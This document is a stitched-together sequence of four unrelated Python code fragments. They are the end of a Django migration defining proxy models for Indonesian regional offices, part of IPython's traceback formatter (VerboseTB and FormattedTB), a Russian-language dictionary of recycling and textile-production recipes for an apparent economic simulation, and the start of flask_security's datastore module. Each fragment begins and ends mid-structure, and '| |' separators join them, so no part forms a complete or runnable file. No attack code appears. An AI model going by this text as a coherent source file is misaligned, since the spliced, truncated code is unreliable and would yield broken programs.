name='SKPDAsalATLPerpustakaan',
fields=[
],
options={
'verbose_name': '08 SKPD Asal ATL Perpustakaan',
'proxy': True,
'verbose_name_plural': '08 SKPD Asal ATL Perpustakaan',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLPertanian',
fields=[
],
options={
'verbose_name': '13 SKPD Asal ATL Pertanian',
'proxy': True,
'verbose_name_plural': '13 SKPD Asal ATL Pertanian',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLRSUD',
fields=[
],
options={
'verbose_name': '06 SKPD Asal ATL RSUD',
'proxy': True,
'verbose_name_plural': '06 SKPD Asal ATL RSUD',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLSATPOLPP',
fields=[
],
options={
'verbose_name': '25 SKPD Asal ATL SATPOLPP',
'proxy': True,
'verbose_name_plural': '25 SKPD Asal ATL SATPOLPP',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLSekretariatKorpri',
fields=[
],
options={
'verbose_name': '27 SKPD Asal ATL Sekretariat Korpri',
'proxy': True,
'verbose_name_plural': '27 SKPD Asal ATL Sekretariat Korpri',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLSetda',
fields=[
],
options={
'verbose_name': '02 SKPD Asal ATL Setda',
'proxy': True,
'verbose_name_plural': '02 SKPD Asal ATL Setda',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLSetwan',
fields=[
],
| |
formatvalue=var_repr
)
call = tpl_call.format(file=func, scope=scope)
except KeyError:
# This happens in situations like errors inside generator
# expressions, where local variables are listed in the
# line, but can't be extracted from the frame. I'm not
# 100% sure this isn't actually a bug in inspect itself,
# but since there's no info for us to compute with, the
# best we can do is report the failure and move on. Here
# we must *not* call any traceback construction again,
# because that would mess up use of %debug later on. So we
# simply report the failure and move on. The only
# limitation will be that this frame won't have locals
# listed in the call signature. Quite subtle problem...
# I can't think of a good way to validate this in a unit
# test, but running a script consisting of:
# dict( (k,v.strip()) for (k,v) in range(10) )
# will illustrate the error, if this exception catch is
# disabled.
call = tpl_call_fail % func
lvals = ''
lvals_list = []
if self.include_vars:
try:
# we likely want to fix stackdata at some point, but
# still need a workaround.
fibp = frame_info.variables_in_executing_piece
for var in fibp:
lvals_list.append(tpl_name_val % (var.name, repr(var.value)))
except Exception:
lvals_list.append(
"Exception trying to inspect frame. No more locals available."
)
if lvals_list:
lvals = '%s%s' % (indent, em_normal.join(lvals_list))
result = "%s, %s\n" % (link, call)
result += ''.join(_format_traceback_lines(frame_info.lines, Colors, self.has_colors, lvals))
return result
def prepare_header(self, etype, long_version=False):
    """Build the colored header line(s) shown above a formatted traceback.

    *etype* is the exception type (name or class); *long_version* selects
    the multi-line banner with interpreter info and date.
    """
    colors = self.Colors
    normal = colors.Normal
    exc = '%s%s%s' % (colors.excName, etype, normal)
    width = min(75, get_terminal_size()[0])

    if not long_version:
        # Compact form: exception name plus a right-aligned banner.
        return '%s%s' % (
            exc,
            'Traceback (most recent call last)'.rjust(width - len(str(etype))),
        )

    # Verbose form: top rule, exception name, interpreter info and date.
    pyver = 'Python ' + sys.version.split()[0] + ': ' + sys.executable
    date = time.ctime(time.time())
    head = '%s%s%s\n%s%s%s\n%s' % (
        colors.topline, '-' * width, normal,
        exc, ' ' * (width - len(str(etype)) - len(pyver)),
        pyver, date.rjust(width),
    )
    head += "\nA problem occurred executing Python code. Here is the sequence of function" \
            "\ncalls leading up to the error, with the most recent (innermost) call last."
    return head
def format_exception(self, etype, evalue):
    """Return a one-element list holding the colored 'ExcType: value' line."""
    colors = self.Colors
    normal = colors.Normal
    # Get (safely) a string form of the exception info
    try:
        etype_str, evalue_str = str(etype), str(evalue)
    except:
        # User exception is improperly defined.
        etype, evalue = str, sys.exc_info()[:2]
        etype_str, evalue_str = str(etype), str(evalue)

    # ... and format it
    return ['%s%s%s: %s' % (colors.excName, etype_str,
                            normal, py3compat.cast_unicode(evalue_str))]
def format_exception_as_a_whole(
    self,
    etype: type,
    evalue: BaseException,
    etb: TracebackType,
    number_of_lines_of_context,
    tb_offset: Optional[int],
):
    """Formats the header, traceback and exception message for a single exception.

    This may be called multiple times by Python 3 exception chaining
    (PEP 3134).
    """
    assert etb is not None
    # some locals
    # NOTE(review): orig_etype is never read in this method — confirm
    # whether it is dead or kept for API symmetry with subclasses.
    orig_etype = etype
    try:
        # Prefer the bare class name for display; non-classes (e.g. a
        # string etype) have no __name__ and are shown as passed.
        etype = etype.__name__
    except AttributeError:
        pass
    tb_offset = self.tb_offset if tb_offset is None else tb_offset
    assert isinstance(tb_offset, int)
    head = self.prepare_header(etype, self.long_header)
    records = self.get_records(etb, number_of_lines_of_context, tb_offset)

    frames = []
    skipped = 0
    lastrecord = len(records) - 1
    for i, r in enumerate(records):
        if not isinstance(r, stack_data.RepeatedFrames) and self.skip_hidden:
            # Collapse runs of frames flagged __tracebackhide__ into one
            # "[... skipping hidden N frame]" marker.  The last record is
            # always rendered so the failing frame is never hidden.
            if r.frame.f_locals.get("__tracebackhide__", 0) and i != lastrecord:
                skipped += 1
                continue
        if skipped:
            Colors = self.Colors  # just a shorthand + quicker name lookup
            ColorsNormal = Colors.Normal  # used a lot
            frames.append(
                "    %s[... skipping hidden %s frame]%s\n"
                % (Colors.excName, skipped, ColorsNormal)
            )
            skipped = 0
        frames.append(self.format_record(r))
    # Flush a trailing run of hidden frames (loop ended while counting).
    if skipped:
        Colors = self.Colors  # just a shorthand + quicker name lookup
        ColorsNormal = Colors.Normal  # used a lot
        frames.append(
            "    %s[... skipping hidden %s frame]%s\n"
            % (Colors.excName, skipped, ColorsNormal)
        )

    formatted_exception = self.format_exception(etype, evalue)
    if records:
        # Let the editor-sync hook jump to the innermost frame's location.
        frame_info = records[-1]
        ipinst = get_ipython()
        if ipinst is not None:
            ipinst.hooks.synchronize_with_editor(frame_info.filename, frame_info.lineno, 0)

    return [[head] + frames + [''.join(formatted_exception[0])]]
def get_records(
    self, etb: TracebackType, number_of_lines_of_context: int, tb_offset: int
):
    """Collect stack_data FrameInfo records for *etb*, dropping the first
    *tb_offset* entries and showing *number_of_lines_of_context* source
    lines around each executing line."""
    # Split the context lines around the executing line: the extra lines
    # go before it when the count is odd.
    context = number_of_lines_of_context - 1
    after = context // 2
    before = context - after

    if self.has_colors:
        # Highlight the executing node on a dark-blue background.
        base_style = get_style_by_name('default')
        exec_style = stack_data.style_with_executing_node(base_style, 'bg:#00005f')
        formatter = Terminal256Formatter(style=exec_style)
    else:
        formatter = None

    options = stack_data.Options(
        before=before, after=after, pygments_formatter=formatter
    )
    assert etb is not None
    return list(stack_data.FrameInfo.stack_data(etb, options=options))[tb_offset:]
def structured_traceback(
    self,
    etype: type,
    evalue: Optional[BaseException],
    etb: TracebackType,
    tb_offset: Optional[int] = None,
    number_of_lines_of_context: int = 5,
):
    """Return a nice text document describing the traceback."""
    assert etb is not None
    formatted_exception = self.format_exception_as_a_whole(etype, evalue, etb, number_of_lines_of_context,
                                                           tb_offset)

    colors = self.Colors  # just a shorthand + quicker name lookup
    colorsnormal = colors.Normal  # used a lot
    head = '%s%s%s' % (colors.topline, '-' * min(75, get_terminal_size()[0]), colorsnormal)
    structured_traceback_parts = [head]
    chained_exceptions_tb_offset = 0
    lines_of_context = 3
    formatted_exceptions = formatted_exception
    # Walk the exception chain (PEP 3134): format each linked exception
    # after the primary one; get_parts_of_chained_exception yields the
    # next (etype, evalue, etb) or a false value when the chain ends.
    exception = self.get_parts_of_chained_exception(evalue)
    if exception:
        assert evalue is not None
        formatted_exceptions += self.prepare_chained_exception_message(evalue.__cause__)
        etype, evalue, etb = exception
    else:
        evalue = None

    # Track already-seen exception ids so a cyclic __cause__/__context__
    # chain cannot loop forever.
    chained_exc_ids = set()
    while evalue:
        formatted_exceptions += self.format_exception_as_a_whole(etype, evalue, etb, lines_of_context,
                                                                 chained_exceptions_tb_offset)
        exception = self.get_parts_of_chained_exception(evalue)

        if exception and not id(exception[1]) in chained_exc_ids:
            chained_exc_ids.add(id(exception[1]))  # trace exception to avoid infinite 'cause' loop
            formatted_exceptions += self.prepare_chained_exception_message(evalue.__cause__)
            etype, evalue, etb = exception
        else:
            evalue = None

    # we want to see exceptions in a reversed order:
    # the first exception should be on top
    for formatted_exception in reversed(formatted_exceptions):
        structured_traceback_parts += formatted_exception

    return structured_traceback_parts
def debugger(self, force: bool = False):
    """Call up the pdb debugger if desired, always clean up the tb
    reference.

    Keywords:

      - force(False): by default, this routine checks the instance call_pdb
        flag and does not actually invoke the debugger if the flag is false.
        The 'force' option forces the debugger to activate even if the flag
        is false.

    If the call_pdb flag is set, the pdb interactive debugger is
    invoked. In all cases, the self.tb reference to the current traceback
    is deleted to prevent lingering references which hamper memory
    management.

    Note that each call to pdb() does an 'import readline', so if your app
    requires a special setup for the readline completers, you'll have to
    fix that by hand after invoking the exception handler."""
    if force or self.call_pdb:
        # Lazily create the debugger instance on first use.
        if self.pdb is None:
            self.pdb = self.debugger_cls()
        # the system displayhook may have changed, restore the original
        # for pdb
        display_trap = DisplayTrap(hook=sys.__displayhook__)
        with display_trap:
            self.pdb.reset()
            # Find the right frame so we don't pop up inside ipython itself
            if hasattr(self, 'tb') and self.tb is not None:
                etb = self.tb
            else:
                # Fall back to the last traceback the interpreter recorded.
                etb = self.tb = sys.last_traceback
            # Advance self.tb to the innermost frame of the traceback.
            while self.tb is not None and self.tb.tb_next is not None:
                assert self.tb.tb_next is not None
                self.tb = self.tb.tb_next
            if etb and etb.tb_next:
                # Skip the outermost frame (the shell's own exec frame).
                etb = etb.tb_next
            self.pdb.botframe = etb.tb_frame
            self.pdb.interaction(None, etb)

    # Drop the traceback reference regardless of whether pdb ran, so we
    # don't keep frames (and everything they reference) alive.
    if hasattr(self, 'tb'):
        del self.tb
def handler(self, info=None):
    """Format the exception described by *info* — a (type, value, tb)
    triple, defaulting to sys.exc_info() — and write it to self.ostream."""
    etype, evalue, etb = info or sys.exc_info()
    # Keep the traceback around for a later %debug / debugger() call.
    self.tb = etb
    stream = self.ostream
    stream.flush()
    stream.write(self.text(etype, evalue, etb))
    stream.write('\n')
    stream.flush()
# Changed so an instance can just be called as VerboseTB_inst() and print
# out the right info on its own.
def __call__(self, etype=None, evalue=None, etb=None):
    """This hook can replace sys.excepthook (for Python 2.1 or higher)."""
    # With no traceback, fall back to sys.exc_info() inside handler().
    info = None if etb is None else (etype, evalue, etb)
    self.handler(info)
    try:
        self.debugger()
    except KeyboardInterrupt:
        # The user bailed out of the debugger prompt.
        print("\nKeyboardInterrupt")
#----------------------------------------------------------------------------
class FormattedTB(VerboseTB, ListTB):
"""Subclass ListTB but allow calling with a traceback.
It can thus be used as a sys.excepthook for Python > 2.1.
Also adds 'Context' and 'Verbose' modes, not available in ListTB.
Allows a tb_offset to be specified. This is useful for situations where
one needs to remove a number of topmost frames from the traceback (such as
occurs with python programs that themselves execute other python code,
like Python shells). """
mode: str
def __init__(self, mode='Plain', color_scheme='Linux', call_pdb=False,
ostream=None,
tb_offset=0, long_header=False, include_vars=False,
check_cache=None, debugger_cls=None,
parent=None, config=None):
# NEVER change the order of this list. Put new modes at the end:
self.valid_modes = ['Plain', 'Context', 'Verbose', 'Minimal']
self.verbose_modes = self.valid_modes[1:3]
VerboseTB.__init__(self, color_scheme=color_scheme, call_pdb=call_pdb,
ostream=ostream, tb_offset=tb_offset,
long_header=long_header, include_vars=include_vars,
check_cache=check_cache, | |
'_-Утилизация одежды (нормо-часов)':2 / 60,
'+Ткань хлопчатая, лоскуты (доступно/квадратный метр)':0.53,
}
# Clothing recycling recipes. Keys prefixed '_-' record labor (norm-hours),
# '+' keys record reclaimed scrap materials.
# NOTE(review): prefix semantics inferred from naming — confirm against the
# code that consumes metadict_detail.
metadict_detail['_Утилизация одежды, чулки (хлопок)'] = {
    '_-Утилизация одежды (нормо-часов)':2 / 60,
    '+Ткань хлопчатая, лоскуты (доступно/квадратный метр)':0.95,
}
metadict_detail['_Утилизация одежды, жилет (парусина)'] = {
    '_-Утилизация одежды (нормо-часов)':2 / 60,
    '+Ткань льняная, лоскуты (доступно/квадратный метр)':0.7,
}
metadict_detail['_Утилизация одежды, ветровка (брезент)'] = {
    '_-Утилизация одежды (нормо-часов)':2 / 60,
    '+Ткань льняная, лоскуты (доступно/квадратный метр)':2.0,
    '+Ткань хлопчатая, лоскуты (доступно/квадратный метр)':2.0,
}
metadict_detail['_Утилизация одежды, плащ (брезент)'] = {
    '_-Утилизация одежды (нормо-часов)':10 / 60,
    '+Ткань льняная, лоскуты (доступно/квадратный метр)':2.1 * 3,
    '+Вата техническая (доступно/кубометр)':2.1 * 0.01,
}
metadict_detail['_Утилизация одежды, шляпа (солома)'] = {
    # Lol, why bother? (nothing worth reclaiming from a straw hat)
}
#----
# Recycling (footwear)
metadict_detail['_Утилизация обуви, ботинки (кирза)'] = {
    '_-Утилизация обуви (нормо-часов)':5 / 60,
    '+Ткань кирзовая, лоскуты (доступно/квадратный метр)':0.1 * 4,
    '+Подошва резиновая, 3-см, старая (доступно/квадратный метр)':0.01 * 4,
}
metadict_detail['_Утилизация обуви, галоши (резина)'] = {
    '_-Утилизация обуви (нормо-часов)':3 / 60,
    '+Ткань кирзовая, лоскуты (доступно/квадратный метр)':0.06 * 4,
    '+Подошва резиновая, 3-см, старая (доступно/квадратный метр)':0.01 * 4,
}
metadict_detail['_Утилизация обуви, туфли (кирза)'] = {
    '_-Утилизация обуви (нормо-часов)':3 / 60,
    '+Ткань кирзовая, лоскуты (доступно/квадратный метр)':0.06 * 4,
    '+Подошва резиновая, 3-см, старая (доступно/квадратный метр)':0.01 * 4,
}
metadict_detail['_Утилизация обуви, туфли (джут)'] = {
    '_-Утилизация обуви (нормо-часов)':3 / 60,
    '+Ткань джутовая, лоскуты (доступно/квадратный метр)':0.06 * 4,
    '+Ткань джутовая, ковровая, лоскуты (доступно/квадратный метр)':0.01 * 4,
}
#----
# Production (textile industry)
# (Germany in 1895, population 52.5 million)
# https://istmat.info/node/27434
# Linen cloth consumption -- 0.8 kg/person
# Wool cloth production -- 0.8 kg/person (demand is 2 kg/person)
#----
# Production (sewing)
# Occupations (Germany in 1895, population 52.5 million)
# Seamstresses -- 55 per 10,000 population
# Tailors and dressmakers -- 87 per 10,000 population
# Ready-made-garment workers -- 11 per 10,000 population
# Ornament makers -- 10 per 10,000 population
# Footwear production workers -- 77 per 10,000 population
# A significant share of clothing and linen is made within the family
# - stockings (small wholesale, 4 workers) -- 0.8 ruble/pair (6.4 norm-hours)
# - leather mittens (small wholesale, 12 workers) -- 0.4 ruble/pair (0.4 norm-hours)
# - shoes (small wholesale, 20 workers) -- 0.75 ruble/pair (0.8 norm-hours)
# - gloves (wholesale, 45 workers) -- 0.7 ruble/pair (1.44 norm-hours)
# - peaked caps (wholesale, 25 workers) -- 0.87 ruble/piece (0.67 norm-hours)
metadict_detail['_Производство белья (рабочих часов)'] = {
    # Workshop of 12 workers, 19 200 norm-hours/year
    # NOTE(review): the turnover divisor below is 20000, not 19200 — confirm intended.
    '_-Работа швеи (нормо-часов)':1,
    '_Швейная мастерская (годовой оборот)':1 / 20000,
}
metadict_detail['_Производство утвари текстильной (рабочих часов)'] = {
    '_-Работа швеи (нормо-часов)':1,
    '_Швейная мастерская (годовой оборот)':1 / 20000,
}
metadict_detail['_Производство одежды (рабочих часов)'] = {
    # Working on clothing requires better skills:
    '_-Работа портного (нормо-часов)':1,
    '_Швейная мастерская (годовой оборот)':1 / 20000,
}
metadict_detail['_Производство обуви (рабочих часов)'] = {
    '_-Работа сапожника (нормо-часов)':1,
    '_Швейная мастерская (годовой оборот)':1 / 20000,
}
#----
# Production (weaving)
# Material densities:
# calico -- 120 g/sq.meter
# sateen -- 120 g/sq.meter
# sateen-jacquard -- 140 g/sq.meter
# linen cloth -- 150 g/sq.meter
# flannel -- 200 g/sq.meter
# velvet -- 300 g/sq.meter
# cotton suede -- 410 g/sq.meter
# linen canvas -- 450-550 g/sq.meter
# sewing wadding (stuffing) -- 25 kg/cubic meter
# https://tessuti-ital.ru/news/plotnost-tkanej/
# https://ru.wikisource.org/wiki/ЭСБЕ/Хлопчатобумажные_ткани
# https://ru.wikisource.org/wiki/Категория:ЭСБЕ:Ткани
# https://ru.wikipedia.org/wiki/Список_типов_тканей
# https://ru.wikipedia.org/wiki/Шаблон:Текстиль
metadict_detail['_Производство бязи (квадратный метр)'] = {
    # Calico -- 120 g/sq.meter
    # Workshop: 10 workers (two shifts), 10 power looms, 16 000 norm-hours/year
    # Unicorns wearing ear protectors. They work from a gallery above the
    # looms so as not to breathe the dust.
    # Weavers change bobbins, mend broken threads and do minor loom repairs.
    # Labor cost: 0.6 norm-hours/sq.meter
    '_-Производство бязи (квадратный метр)':1,
    '_-Беление ткани хлорной известью и содой (килограмм)':0.12,
    '_-Окраска тканей аниловыми красками (килограмм)':0.12,
    'Пряжа хлопчатая (килограмм)':0.12 / 0.95,
    '_Ткацкая мастерская (годовой оборот)':1 / 16000 / 0.6,
}
metadict_detail['_Производство вафельной ткани (квадратный метр)'] = {
    # https://ru.wikisource.org/wiki/ЭСБЕ/Хлопчатобумажные_ткани
    '_-Производство вафельной ткани (квадратный метр)':1,
    '_-Беление ткани хлорной известью и содой (килограмм)':0.2,
    '_-Окраска тканей аниловыми красками (килограмм)':0.2,
    'Пряжа хлопчатая (килограмм)':0.2 / 0.95,
    '_Ткацкая мастерская (годовой оборот)':1 / 16000 / 0.6,
}
metadict_detail['_Производство махровой ткани (квадратный метр)'] = {
    '_-Производство махровой ткани (квадратный метр)':1,
    '_-Беление ткани хлорной известью и содой (килограмм)':0.5,
    '_-Окраска тканей аниловыми красками (килограмм)':0.5,
    'Пряжа хлопчатая (килограмм)':0.5 / 0.95,
    '_Ткацкая мастерская (годовой оборот)':1 / 16000 / 1.2,
}
metadict_detail['_Производство фланели (квадратный метр)'] = {
    '_-Производство фланели (квадратный метр)':1,
    '_-Беление ткани хлорной известью и содой (килограмм)':0.25,
    '_-Окраска тканей аниловыми красками (килограмм)':0.25,
    'Пряжа хлопчатая (килограмм)':0.25 / 0.95,
    '_Ткацкая мастерская (годовой оборот)':1 / 16000 / 0.8,
}
metadict_detail['_Производство бархата (квадратный метр)'] = {
    # Plush, corduroy.
    # TODO: use for upholstering furniture
    # Sofa upholstery -- 4.2 sq.meters
    # Padded chair upholstery -- 0.7 sq.meters
    # 1/10 of households, 2 sofas and 12 padded chairs per year.
    # velvet -- 300 g/sq.meter
    '_-Производство бархата (квадратный метр)':1,
    '_-Беление ткани хлорной известью и содой (килограмм)':0.3,
    '_-Окраска тканей аниловыми красками (килограмм)':0.3,
    'Пряжа хлопчатая (килограмм)':0.3 / 0.95,
    '_Ткацкая мастерская (годовой оборот)':1 / 16000 / 5,
}
metadict_detail['_Производство замши (квадратный метр)'] = {
    # Cotton suede -- 410 g/sq.meter
    '_-Производство замши (квадратный метр)':1,
    '_-Беление ткани хлорной известью и содой (килограмм)':0.41,
    '_-Окраска тканей аниловыми красками (килограмм)':0.41,
    'Пряжа хлопчатая (килограмм)':0.41 / 0.95,
    '_Ткацкая мастерская (годовой оборот)':1 / 16000 / 3,
}
metadict_detail['_Производство сатина (квадратный метр)'] = {
    # Sateen -- 120 g/sq.meter
    '_-Производство сатина (квадратный метр)':1,
    '_-Беление ткани хлорной известью и содой (килограмм)':0.12,
    '_-Окраска тканей аниловыми красками (килограмм)':0.12,
    'Пряжа хлопчатая (килограмм)':0.12 / 0.95,
    '_Ткацкая мастерская (годовой оборот)':1 / 16000 / 2.4,
}
metadict_detail['_Производство льняной ткани (квадратный метр)'] = {
    '_-Производство льняной ткани (квадратный метр)':1,
    '_-Беление ткани хлорной известью и содой (килограмм)':0.15,
    '_-Окраска тканей аниловыми красками (килограмм)':0.15,
    'Пряжа льняная (килограмм)':0.15 / 0.95,
    '_Ткацкая мастерская (годовой оборот)':1 / 16000 / 0.6,
}
metadict_detail['_Производство парусины (квадратный метр)'] = {
    # Half-linen: 50% flax, 50% cotton
    # Canvas -- 500 g/sq.meter
    '_-Производство парусины (квадратный метр)':1,
    '_-Беление ткани хлорной известью и содой (килограмм)':0.5,
    'Пряжа хлопчатая (килограмм)':(0.5 / 0.95) / 2,
    'Пряжа льняная (килограмм)':(0.5 / 0.95) / 2,
    '_Ткацкая мастерская (годовой оборот)':1 / 16000 / 0.3,
}
metadict_detail['_Производство брезента (квадратный метр)'] = {
    # Tarpaulin is impregnated with mineral wax (ozokerite)
    # https://ru.wikisource.org/wiki/ЭСБЕ/Брезент
    # https://ru.wikisource.org/wiki/ЭСБЕ/Озокерит
    # Tarpaulin (for sails) -- 900 g/sq.meter
    '_-Производство брезента (квадратный метр)':1,
    '_-Беление ткани хлорной известью и содой (килограмм)':0.9,
    'Пряжа льняная (килограмм)':0.9 / 0.95,
    '_Ткацкая мастерская (годовой оборот)':1 / 16000 / 0.3,
}
metadict_detail['_Производство джутовой ткани (квадратный метр)'] = {
    '_-Производство джутовой ткани (квадратный метр)':1,
    '_-Беление ткани хлорной известью и содой (килограмм)':0.4,
    'Пряжа джутовая (килограмм)':0.4 / 0.95,
    '_Ткацкая мастерская (годовой оборот)':1 / 16000 / 0.3,
}
metadict_detail['_Производство мешковины (квадратный метр)'] = {
    # TODO: made from fibrous flax leftovers ("flax tow").
    # Sackcloth, bast matting. From cattail, bast, hemp.
    # Density 200-450 g/sq.meter
    # Neither bleached nor dyed.
    '_-Производство мешковины (квадратный метр)':1,
    'Пряжа пеньковая (килограмм)':0.4 / 0.95,
    '_Ткацкая мастерская (годовой оборот)':1 / 16000 / 0.3,
}
metadict_detail['_Производство кирзовой ткани (квадратный метр)'] = {
    # TODO:
    # 1) fabric base.
    # 2) The three-layer fabric is coated with a benzene-water or latex
    # rubber solution with various fillers, dyes and vulcanizing agents.
    # 3) Heat chamber -- a film forms on the surface of the cloth.
    # 4) Calendering -- compacting the material
    # 5) Embossing
    # https://tkanitex.ru/index.php/tkan-kirza-2/
    # Labor cost (rough estimate for now): 1.8 norm-hours/sq.meter
    '_-Производство сукна для кирзовой ткани (квадратный метр)':1,
    'Пряжа хлопчатая (килограмм)':0.3 / 0.95,
    'Резина вулканизированная (килограмм)':0.1 / 0.95,
    '_Ткацкая мастерская (годовой оборот)':1 / 16000 / 1.8,
}
metadict_detail['_Производство соломенной ткани (квадратный метр)'] = {
    # Braid density: 15 poods of straw per 365 skeins (65 arshins/skein) -- 10 g/arshin
    # Braid No.0 (the finest) -- 6 arshins/day from the best craftsman
    # Braid No.5 (coarse) -- 25 arshins/day from an unskilled worker
    '_-Производство соломенной ткани (квадратный метр)':1,
    'Солома сухая (килограмм)':0.6 / 0.5,
    '_Ткацкая мастерская, кустарная (годовой оборот)':1 / 16000 / 0.6,
}
metadict_detail['_Производство соломенных ковров (квадратный метр)'] = {
# "Наставление к изготовлению соломенно-ковровых несгораемых крыш"
# Фермы красноуфимского реального училища.
# Пуда бечевы хватает на 400-520 аршин ковра (284-370 метров)
# Ширина станка -- 1.25 аршина (0.89 метра).
# Квадратный метр ковра -- 56 грамм бечевы.
# Ткётся двумя рабочими по 80-130 аршин/день, (57-92 метра, 50-82 кв.метра)
# Производительность труда -- 2.5-4 кв.метров/нормо-час
# 25% бечевы берут из старых ковров.
'_-Производство соломенных ковров (квадратный метр)':1,
'Солома сухая (килограмм)':2.5,
'Бечева пеньковая швейная (метр)':120 | |
"""
flask_security.datastore
~~~~~~~~~~~~~~~~~~~~~~~~
This module contains user datastore classes.
:copyright: (c) 2012 by <NAME>.
:copyright: (c) 2019-2020 by <NAME> (jwag).
:license: MIT, see LICENSE for more details.
"""
import json
import uuid
from .utils import config_value
class Datastore:
    """Minimal persistence adapter around a db handle.

    Subclasses implement the write primitives (``put``/``delete``) and,
    where the backend is session based, ``commit``.
    """

    def __init__(self, db):
        self.db = db

    def commit(self):
        """Flush pending changes; a no-op by default."""
        return None

    def put(self, model):
        """Persist *model*. Must be implemented by subclasses."""
        raise NotImplementedError

    def delete(self, model):
        """Remove *model*. Must be implemented by subclasses."""
        raise NotImplementedError
class SQLAlchemyDatastore(Datastore):
    """Datastore backed by a (Flask-)SQLAlchemy session."""

    def commit(self):
        self.db.session.commit()

    def put(self, model):
        # Stage the object in the session; the caller commits.
        self.db.session.add(model)
        return model

    def delete(self, model):
        # Mark for deletion; applied on the next commit.
        self.db.session.delete(model)
class MongoEngineDatastore(Datastore):
    """Datastore backed by MongoEngine documents (write-through, no session)."""

    def put(self, model):
        # MongoEngine documents persist themselves immediately.
        model.save()
        return model

    def delete(self, model):
        model.delete()
class PeeweeDatastore(Datastore):
    """Datastore backed by peewee models (write-through, no session)."""

    def put(self, model):
        # peewee models persist themselves immediately.
        model.save()
        return model

    def delete(self, model):
        # recursive=True also removes dependent rows.
        model.delete_instance(recursive=True)
def with_pony_session(f):
    """Decorator: run *f* inside a Pony ORM ``db_session`` tied to the
    current Flask request or app context.

    A session is opened only when none is active yet; it is closed when
    the request finishes (or the app context is popped), so the wrapped
    datastore operation always executes inside a transaction.
    """
    from functools import wraps

    @wraps(f)
    def decorator(*args, **kwargs):
        from pony.orm import db_session
        from pony.orm.core import local
        from flask import (
            after_this_request,
            current_app,
            has_app_context,
            has_request_context,
        )
        from flask.signals import appcontext_popped

        # Only open (and later close) a session if none is active yet.
        register = local.db_context_counter == 0
        if register and (has_app_context() or has_request_context()):
            db_session.__enter__()

        result = f(*args, **kwargs)

        if register:
            if has_request_context():
                # Close the session once the response has been produced.
                @after_this_request
                def pop(request):
                    db_session.__exit__()
                    return request

            elif has_app_context():
                # No request: close any remaining nested sessions when
                # the application context is popped.
                @appcontext_popped.connect_via(current_app._get_current_object())
                def pop(sender, *args, **kwargs):
                    while local.db_context_counter:
                        db_session.__exit__()
            else:
                raise RuntimeError("Needs app or request context")
        return result

    return decorator
class PonyDatastore(Datastore):
    """Datastore backed by Pony ORM; writes run inside a db_session."""

    def commit(self):
        self.db.commit()

    @with_pony_session
    def put(self, model):
        # Entering the db_session (via the decorator) is sufficient;
        # Pony flushes changes when the session exits.
        return model

    @with_pony_session
    def delete(self, model):
        model.delete()
class UserDatastore:
"""Abstracted user datastore.
:param user_model: A user model class definition
:param role_model: A role model class definition
.. important::
For mutating operations, the user/role will be added to the
datastore (by calling self.put(<object>). If the datastore is session based
(such as for SQLAlchemyDatastore) it is up to caller to actually
commit the transaction by calling datastore.commit().
"""
def __init__(self, user_model, role_model):
self.user_model = user_model
self.role_model = role_model
def _prepare_role_modify_args(self, role):
if isinstance(role, str):
role = self.find_role(role)
return role
def _prepare_create_user_args(self, **kwargs):
kwargs.setdefault("active", True)
roles = kwargs.get("roles", [])
for i, role in enumerate(roles):
rn = role.name if isinstance(role, self.role_model) else role
# see if the role exists
roles[i] = self.find_role(rn)
kwargs["roles"] = roles
kwargs.setdefault("fs_uniquifier", uuid.uuid4().hex)
return kwargs
def find_user(self, *args, **kwargs):
    """Returns a user matching the provided parameters.

    Abstract: concrete datastores implement the actual query.
    """
    raise NotImplementedError
def find_role(self, *args, **kwargs):
    """Returns a role matching the provided name.

    Abstract: concrete datastores implement the actual query.
    """
    raise NotImplementedError
def add_role_to_user(self, user, role):
"""Adds a role to a user.
:param user: The user to manipulate. Can be an User object or email
:param role: The role to add to the user. Can be a Role object or
string role name
:return: True is role was added, False if role already existed.
"""
role = self._prepare_role_modify_args(role)
if role not in user.roles:
user.roles.append(role)
self.put(user)
return True
return False
def remove_role_from_user(self, user, role):
"""Removes a role from a user.
:param user: The user to manipulate. Can be an User object or email
:param role: The role to remove from the user. Can be a Role object or
string role name
:return: True if role was removed, False if role doesn't exist or user didn't
have role.
"""
rv = False
role = self._prepare_role_modify_args(role)
if role in user.roles:
rv = True
user.roles.remove(role)
self.put(user)
return rv
def add_permissions_to_role(self, role, permissions):
"""Add one or more permissions to role.
:param role: The role to modify. Can be a Role object or
string role name
:param permissions: a set, list, or single string.
:return: True if permissions added, False if role doesn't exist.
Caller must commit to DB.
.. versionadded:: 4.0.0
"""
rv = False
role = self._prepare_role_modify_args(role)
if role:
rv = True
role.add_permissions(permissions)
self.put(role)
return rv
def remove_permissions_from_role(self, role, permissions):
"""Remove one or more permissions from a role.
:param role: The role to modify. Can be a Role object or
string role name
:param permissions: a set, list, or single string.
:return: True if permissions removed, False if role doesn't exist.
Caller must commit to DB.
.. versionadded:: 4.0.0
"""
rv = False
role = self._prepare_role_modify_args(role)
if role:
rv = True
role.remove_permissions(permissions)
self.put(role)
return rv
def toggle_active(self, user):
"""Toggles a user's active status. Always returns True."""
user.active = not user.active
self.put(user)
return True
def deactivate_user(self, user):
"""Deactivates a specified user. Returns `True` if a change was made.
This will immediately disallow access to all endpoints that require
authentication either via session or tokens.
The user will not be able to log in again.
:param user: The user to deactivate
"""
if user.active:
user.active = False
self.put(user)
return True
return False
def activate_user(self, user):
"""Activates a specified user. Returns `True` if a change was made.
:param user: The user to activate
"""
if not user.active:
user.active = True
self.put(user)
return True
return False
def set_uniquifier(self, user, uniquifier=None):
"""Set user's Flask-Security identity key.
This will immediately render outstanding auth tokens,
session cookies and remember cookies invalid.
:param user: User to modify
:param uniquifier: Unique value - if none then uuid.uuid4().hex is used
This method is a no-op if the user model doesn't contain the attribute
``fs_uniquifier``
.. versionadded:: 3.3.0
"""
if not uniquifier:
uniquifier = uuid.uuid4().hex
user.fs_uniquifier = uniquifier
self.put(user)
def create_role(self, **kwargs):
"""
Creates and returns a new role from the given parameters.
Supported params (depending on RoleModel):
:kwparam name: Role name
:kwparam permissions: a comma delimited list of permissions, a set or a list.
These are user-defined strings that correspond to strings used with
